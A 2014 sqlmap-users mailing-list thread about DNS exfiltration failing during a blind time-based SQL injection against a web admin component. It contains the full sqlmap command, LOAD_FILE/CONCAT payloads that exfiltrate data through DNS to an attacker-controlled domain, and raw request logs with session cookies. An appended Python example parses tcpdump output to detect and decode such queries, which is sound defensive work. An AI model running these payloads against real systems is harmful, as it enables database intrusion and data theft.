Re: [sqlmap-users] Problem with dns exfiltration
From: Chris C. <ccl...@ou...> - 2014-01-23 18:58:40
Miroslav,

Thanks for the reply. I was looking at my tcpdump wrong. The dns traffic I saw was from my sqlmap system itself looking up the target’s dns name, not the target (or any other host) querying for records on my domain. So it seems that the target system isn’t sending dns queries out. Anything else I can try, or am I just stuck with blind extraction here?

Here’s my sqlmap run and tcpdump if it helps:

sqlmap
==================================
root@Maple ~/s/g/sqlmap# ./sqlmap.py -u "https://ato.target.net/administrator/index.php?option=com_mcsearch&templateId=*/&view=searchtemplate" --random-agent --risk=3 --level=5 -a --dbms=mysql --threads=1 --predict-output --dns-domain=mydomain.net -v2 --banner --time-sec=10 --tamper=between --load-cookies=/root/cookies.txt

    sqlmap/1.0-dev-ab36e5a - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:07:01

[13:07:01] [DEBUG] cleaning up configuration parameters
[13:07:01] [INFO] setting up DNS server instance
[13:07:01] [INFO] loading tamper script 'between'
[13:07:01] [DEBUG] setting the HTTP timeout
[13:07:01] [DEBUG] loading random HTTP User-Agent header(s) from file '/root/sectools/git/sqlmap/txt/user-agents.txt'
[13:07:01] [INFO] fetched random HTTP User-Agent header from file '/root/sectools/git/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2
[13:07:01] [DEBUG] setting the HTTP method to GET
[13:07:01] [DEBUG] creating HTTP requests opener object
[13:07:01] [INFO] loading cookies from '/root/cookies.txt'
[13:07:01] [DEBUG] forcing back-end DBMS to user defined value
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[13:07:04] [INFO] testing connection to the target URL
[13:07:05] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: https://ato.target.net:443/administrator/index.php?option=com_mcsearch&templateId=-5154 OR 7979=SLEEP(10)-- MarC/&view=searchtemplate
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:07:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:07:05] [INFO] testing MySQL
[13:07:06] [WARNING] reflective value(s) found and filtering out
[13:07:06] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:07:38] [INFO] confirming MySQL
[13:07:38] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:08:20] [INFO] the back-end DBMS is MySQL
[13:08:20] [INFO] fetching banner
[13:08:20] [INFO] testing for data retrieval through DNS channel
[13:08:20] [DEBUG] performed 1 queries in 0.88 seconds
[13:08:20] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
[13:08:20] [INFO] retrieved: 5.0.95-log
[13:18:53] [DEBUG] performed 69 queries in 633.52 seconds
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner: '5.0.95-log'
==================================

tcpdump
==================================
root@Maple ~# tcpdump -nvvi eth0 port 53
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!] 61116+ A? ato.target.net. (38)
12:35:44.667229 IP (tos 0x0, ttl 64, id 22921, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x37e7!] 24158+ AAAA? ato.target.net. (38)
12:35:44.710564 IP (tos 0x0, ttl 45, id 824, offset 0, flags [none], proto UDP (17), length 151)
    8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 24158 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none], proto UDP (17), length 82)
    8.8.8.8.53 > <sqlmap machine>.52795: [udp sum ok] 61116 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
12:35:44.716854 IP (tos 0x0, ttl 64, id 22922, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa3b7!] 56658+ A? ato.target.net. (38)
12:35:44.716880 IP (tos 0x0, ttl 64, id 22923, offset 0, flags [DF], proto UDP (17), length 66)
    <sqlmap machine>.58257 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0x6497!] 7256+ AAAA? ato.target.net. (38)
12:35:44.747848 IP (tos 0x0, ttl 45, id 22554, offset 0, flags [none], proto UDP (17), length 151)
    8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 7256 q: AAAA? ato.target.net. 0/1/0 ns: target.net. SOA ns-xxxx.awsdns-29.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 (123)
12:35:44.763158 IP (tos 0x0, ttl 45, id 49299, offset 0, flags [none], proto UDP (17), length 82)
    8.8.8.8.53 > <sqlmap machine>.58257: [udp sum ok] 56658 q: A? ato.target.net. 1/0/0 ato.target.net. A XXX.XXX.XXX.172 (54)
==================================

Chris

On Jan 23, 2014, at 1:42 AM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Chris.
>
> It looks quite right. It would be tremendously helpful if you could send a console output and a tcpdump (you can limit to only port 53) for the following run:
>
> sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..."
>
> From your given description it looks like everything should be up and running.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...> wrote:
> Hey all,
>
> I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit and am trying to get dns exfil to work, but am not having any luck.
>
> I start sqlmap as root with the --dns-domain option set to a domain that I control and have the sqlmap machine set as the authoritative NS for. Running with a -v6, this is the info I get:
>
> ===============================================
> [18:22:18] [INFO] testing for data retrieval through DNS channel
> [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- PyBa
> [18:22:18] [TRAFFIC OUT] HTTP request [#3]:
> GET /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate HTTP/1.1
> Accept-language: en-us,en;q=0.5
> Accept-encoding: gzip,deflate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Pragma: no-cache
> Cache-control: no-cache,no-store
> Cookie: Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec
> Connection: close
>
> [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK):
> Content-length: 8627
> Content-encoding: gzip
> Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, 22-Jan-2015 23:22:20 GMT; path=/; httponly
> Expires: Mon, 1 Jan 2001 00:00:00 GMT
> Vary: Accept-Encoding
> Uri: https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate
> Server: Apache
> Last-modified: Wed, 22 Jan 2014 23:22:20 GMT
> Connection: close
> Pragma: no-cache
> Cache-control: post-check=0, pre-check=0
> Date: Wed, 22 Jan 2014 23:22:20 GMT
> P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
> Content-type: text/html; charset=utf-8
>
> [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds
> [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
> ===============================================
>
> If I run a tcpdump on the sqlmap machine, I see dns requests come in for “target.net” and if I do manual dns queries to the domain I own, sqlmap responds as expected with localhost.domain.com.
>
>
> Any idea? Am I doing anything wrong?
>
>
> Chris
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
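As an added example (not code from the thread or from sqlmap), here is the check that resolves the mix-up above: split a port-53 capture into the sqlmap host's own lookups and inbound queries for the zone it is authoritative for, and hex-decode the latter the way the LOAD_FILE(CONCAT(...)) name in the quoted run is built (prefix label, hex label, suffix label, zone). The sample capture, the 10.0.0.5 sqlmap host and the mydomain.net zone are constructed placeholders.

```python
import re
from collections import Counter
# Constructed sample in tcpdump -nvv layout, modelled on the thread's capture;
# the addresses and the hex label are made up for this example.
SAMPLE_CAPTURE = """\
12:35:44.667201 IP (tos 0x0, ttl 64, id 22920, offset 0, flags [DF], proto UDP (17), length 66)
    10.0.0.5.52795 > 8.8.8.8.53: [bad udp cksum 0xb64b -> 0xa7a3!] 61116+ A? ato.target.net. (38)
12:35:44.711455 IP (tos 0x0, ttl 45, id 22553, offset 0, flags [none], proto UDP (17), length 82)
    8.8.8.8.53 > 10.0.0.5.52795: [udp sum ok] 61116 q: A? ato.target.net. 1/0/0 ato.target.net. A 203.0.113.172 (54)
12:36:01.120000 IP (tos 0x0, ttl 50, id 4321, offset 0, flags [none], proto UDP (17), length 90)
    198.51.100.9.40001 > 10.0.0.5.53: [udp sum ok] 777 A? Mwj.352e302e39352d6c6f67.yVN.mydomain.net. (62)
"""

# Matches query records only; response records ("... 61116 q: A? ...") do not fit.
QUERY_RE = re.compile(
    r"^\S+ IP \(.*?\) (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"\[[^\]]*\] \d+\S* [A-Z]+\? (?P<qname>\S+) \(\d+\)$"
)

def packets(capture):
    """One string per packet: tcpdump -v puts the transport half on an indented line."""
    return re.sub(r"\n[ \t]+", " ", capture).splitlines()

def classify(packet, local_ip, zone):
    """Return (kind, qname) for a DNS query, or None for responses and other lines."""
    m = QUERY_RE.match(packet)
    if not m:
        return None
    qname = m["qname"].rstrip(".").lower()
    if m["src"] == local_ip:
        # Our own resolver traffic (sqlmap resolving the target's hostname): what
        # the thread first mistook for exfiltration.
        return "own-lookup", qname
    if m["dst"] == local_ip and m["dport"] == "53" and qname.endswith("." + zone.lower()):
        return "exfil-query", qname
    return "other", qname

def decode_exfil_label(qname, zone):
    """Recover the hex label from <prefix>.<hex>.<suffix>.<zone>, the name the thread's
    LOAD_FILE(CONCAT(...)) payload builds; None when the name does not fit that shape."""
    labels = qname.lower().removesuffix("." + zone.lower()).split(".")
    try:
        return bytes.fromhex("".join(labels[1:-1])).decode("ascii", "replace") or None
    except ValueError:
        return None

def audit(capture, local_ip, zone):
    hits = [h for h in (classify(p, local_ip, zone) for p in packets(capture)) if h]
    data = [decode_exfil_label(q, zone) for kind, q in hits if kind == "exfil-query"]
    return dict(Counter(kind for kind, _ in hits)), data
```

Run from the zone's own authoritative server, the same parser turns hex-labelled inbound queries into a detection signal for this style of exfiltration rather than a troubleshooting aid.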